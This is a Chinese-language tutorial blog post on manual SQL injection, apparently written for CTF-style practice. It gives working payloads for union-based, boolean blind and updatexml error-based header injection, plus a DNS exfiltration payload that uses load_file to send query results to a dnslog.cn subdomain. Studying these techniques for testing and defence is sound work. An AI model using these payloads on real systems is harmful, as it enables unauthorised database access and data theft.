sql手動注入經驗總結
- 基本知識
- sql注入
- SQL盲注
- head注入
- dns漏洞注入
總結了一下sql幾個注入的基本思路和用法,現來分享一下
基本知識
sql注入
如何判斷有無注入: and1=2
步驟:
1、找注入點(id=1等等)
2、通過order by 找出一共有多少列數,(報錯數字前一個)id=1 order by 3 (前面不用加and)
3、利用union select 1,2,3 (一般用null取代)到那個數字 顯示哪個數字證明那個數字是輸出點 id=1 union select 1,2,3 (前面不用加and)
4、把輸出點更換成對應函式測出庫名,表名,欄位,資料等
拓展
and 1=2 可更換成 id=1.1/999999 (報錯即可)
limit1,1 第一個1代表列數,第二個1代表出現多少個結果
通過原始碼判斷是否通過’'或者 ()使陳述句無效
如果id=‘1’ 則搭建陳述句時用 ’ union select 1,2,3 — sad
如果是id=(‘1’) 則搭建陳述句時用 ’) union select 1,2,3 — sad
SQL盲注
如何判斷有無注入SQL盲注:同上
就是無法直觀看到顯示結果,通過對錯判斷是否猜解正確
利用burp爆破猜解
平常陳述句:
猜庫名:
and (ascii(substr(database(),1,1)))=107 回傳正常,說明資料庫名稱第一位是k
猜表名:
and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 回傳正常,說明當前資料庫第一個表長度是6
and substr((select table_name from information_schema.tables where table_schema='kanwolongxia
' limit 0,1),1,1)='l' 回傳正常,說明資料庫表名的第一個的第一位是l
猜欄位名:
and substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),1,1)='i' 回傳正常,說明loflag表中的列名稱第一位是i
太麻煩了burp的intruder爆破猜解一步到位
具體步驟就把那幾個輸入改變點的可能字典集放到里面爆破就完事了
head注入
如何判斷有無head注入:拿head去另一個瀏覽器不登陸也能進該網站
head注入可以利用burp抓包改包,放到Repeater去go完事
這里推薦插件Modheader(可以ua、referer、xff注入都可)
直接寫重繪就行
主要流程代碼
' or updatexml(1,concat(0x7e,(select database())),1),1)-- adf
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag_head' limit 1,1)),1),1) -- qwe
' or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),1) -- qwe
拓展
updatexml() 更新xml檔案的函式
語法:updatexml(目標xml內容,xml檔案路徑,更新的內容)
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
實際上這里是去更新了XML檔案,但是我們在XML檔案路徑的位置里面寫入了子查詢,我們輸入特殊字符,然后就因為不符合輸入規則然后報錯了
但是報錯的時候他其實已經執行了那個子查詢代碼
dns漏洞注入
使用場景:在某些無法直接利用漏洞獲得回顯的情況下,但是目標可以發起請求,這個時候就可以通過DNSLOG把想獲得的資料外帶出來
推薦網站
利用這個網站構建要添加的子域名
像下面:select database()是查詢陳述句 cp846m.dnslog.cn是子域名(記得前面加點)1.txt不存在只起到查詢作用
and load_file(concat(’//’,(select database()),’.cp846m.dnslog.cn/1.txt’))
查詢陳述句結果可在該網看到
拓展
LOAD_FILE:讀取檔案并回傳檔案內容為字串
多次查詢同一陳述句不會改變結果,因為不會重復決議,可以更改子域名或者在前面加.asd.等等
持續更新
未經同意不許轉載
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/23075.html
標籤:AI
下一篇:自己寫的電子時鐘小程式很簡單